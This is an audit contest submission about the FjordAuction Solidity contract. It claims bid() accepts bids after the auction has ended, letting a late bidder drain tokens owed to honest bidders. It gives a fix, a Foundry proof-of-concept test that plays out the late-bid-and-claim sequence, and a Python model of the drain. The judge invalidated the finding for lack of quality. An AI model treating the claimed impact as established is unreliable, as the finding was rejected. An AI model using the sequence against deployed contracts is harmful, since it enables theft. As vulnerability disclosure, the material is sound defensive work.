DeFiFoundry
20,000 USDC
Submission Details
Severity: high
Invalid

Malicious user can cause lack of liquidity in auctions

Summary

An attacker can exploit the auction contract by ending the auction and then placing additional bids, preventing honest bidders from claiming tokens and leading to a lack of liquidity. This vulnerability allows attackers to manipulate the auction outcome and steal tokens meant for honest bidders.

Vulnerability Details

AFFECTED CONTRACT FILE:

2024-08-fjord/src/FjordAuction.sol at main · Cyfrin/2024-08-fjord (github.com)

The bid() function allows bids to be placed after the auction has ended.

Affected Function:

```solidity
function bid(uint256 amount) external {
    bids[msg.sender] = bids[msg.sender].add(amount);
    totalBids = totalBids.add(amount);
    fjordPoints.transferFrom(msg.sender, address(this), amount);
    emit BidAdded(msg.sender, amount);
}
```

Root Cause:
The bid() function lacks a check to prevent bids after the auction end time (auctionEndTime).

Impact

Lack of liquidity for honest bidders:

The impact of this issue is that honest bidders will not receive their tokens or will experience delays in receiving them due to the lack of liquidity caused by late bids.

Tools Used

VS Code

Recommendations

Update the bid() function to prevent bids after the auction has ended.

```solidity
function bid(uint256 amount) external {
    if (block.timestamp >= auctionEndTime) {
        revert AuctionAlreadyEnded();
    }
    bids[msg.sender] = bids[msg.sender].add(amount);
    totalBids = totalBids.add(amount);
    fjordPoints.transferFrom(msg.sender, address(this), amount);
    emit BidAdded(msg.sender, amount);
}
```

By adding the end-time check, we ensure that bids cannot be placed once the auction has ended, whether auctionEnd() has already been called or the auction end time has simply been reached. This prevents malicious users from placing bids after the auction has ended, which would otherwise lead to a lack of liquidity for honest bidders.

**POC CODE WALKTHROUGH: PROCESS TO REPRODUCE IT**

Attack Code:

Here is my PoC code from the test file.

```solidity
function testLackOfLiquidity() public {
    address bidder = address(0x2); // honest bidder, bids before the end time
    address user = address(0xf);   // late bidder, bids after auctionEnd()
    uint256 bidAmount = 100 ether;
    uint256 attackAmount = 100 ether;
    deal(address(fjordPoints), bidder, bidAmount);
    deal(address(fjordPoints), user, attackAmount);

    // honest bid placed while the auction is open
    vm.startPrank(bidder);
    fjordPoints.approve(address(auction), bidAmount);
    auction.bid(bidAmount);
    vm.stopPrank();

    // move past the bidding window
    skip(biddingTime);

    // end the auction, then place a bid anyway and claim immediately
    vm.startPrank(user);
    fjordPoints.approve(address(auction), attackAmount);
    auction.auctionEnd();
    auction.bid(attackAmount);
    auction.claimTokens();
    vm.stopPrank();

    // the honest bidder's claim is now short of liquidity
    vm.prank(bidder);
    auction.claimTokens();
}
```

This PoC shows how the auction contract can be exploited by placing bids after the auction has ended, leading to a lack of liquidity for honest bidders.
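To make the impact described in the Root Cause, Impact and PoC sections concrete, here is an added Python model (not the project's code) that replays the PoC scenario with numbers, once with the affected bid() and once with the recommended end-time check. It assumes, as the PoC implies, that auctionEnd() fixes a payout rate from the bids present at that moment and that claimTokens() pays bids multiplied by that rate; token amounts are constructed sample values.

```python
from dataclasses import dataclass, field


class AuctionAlreadyEnded(Exception):
    """Mirrors the revert in the recommended bid() check."""


class InsufficientLiquidity(Exception):
    """Token transfer would fail: the auction holds fewer tokens than claimed."""


@dataclass
class Auction:
    total_tokens: int          # auction tokens held for distribution (constructed value)
    end_time: int              # auctionEndTime
    check_end_in_bid: bool     # False = affected bid(), True = recommended bid()
    now: int = 0               # stands in for block.timestamp
    bids: dict = field(default_factory=dict)
    total_bids: int = 0
    ended: bool = False
    multiplier: int = 0        # tokens per bid unit, ASSUMED fixed at auction_end()

    def bid(self, who: str, amount: int) -> None:
        if self.check_end_in_bid and self.now >= self.end_time:
            raise AuctionAlreadyEnded()
        self.bids[who] = self.bids.get(who, 0) + amount
        self.total_bids += amount

    def auction_end(self) -> None:
        assert self.now >= self.end_time and not self.ended
        self.ended = True
        self.multiplier = self.total_tokens // self.total_bids  # rate snapshot

    def claim_tokens(self, who: str) -> int:
        assert self.ended
        claimable = self.bids.get(who, 0) * self.multiplier
        if claimable > self.total_tokens:
            raise InsufficientLiquidity(f"{who} claims {claimable}, only {self.total_tokens} left")
        self.bids[who] = 0
        self.total_tokens -= claimable
        return claimable


def run_scenario(check_end_in_bid: bool) -> dict:
    """Honest bidder bids, time passes, auction ends, late bidder bids and claims first."""
    a = Auction(total_tokens=1000, end_time=100, check_end_in_bid=check_end_in_bid)
    a.bid("bidder", 100)
    a.now = 100                      # skip(biddingTime)
    a.auction_end()                  # multiplier = 1000 // 100 = 10
    try:
        a.bid("user", 100)           # the late bid: inflates bids[], not the rate
    except AuctionAlreadyEnded:
        return {"late_bid": "reverted", "user": 0, "bidder": a.claim_tokens("bidder")}
    user = a.claim_tokens("user")    # 100 * 10 = 1000, drains the auction
    try:
        bidder = a.claim_tokens("bidder")
    except InsufficientLiquidity:
        bidder = None                # honest bidder's claim fails
    return {"late_bid": "accepted", "user": user, "bidder": bidder}
```

With the affected bid(), the late bidder walks away with all 1000 tokens and the honest bidder's claim fails; with the end-time check, the late bid reverts and the honest bidder receives the full 1000.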

Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Lack of quality
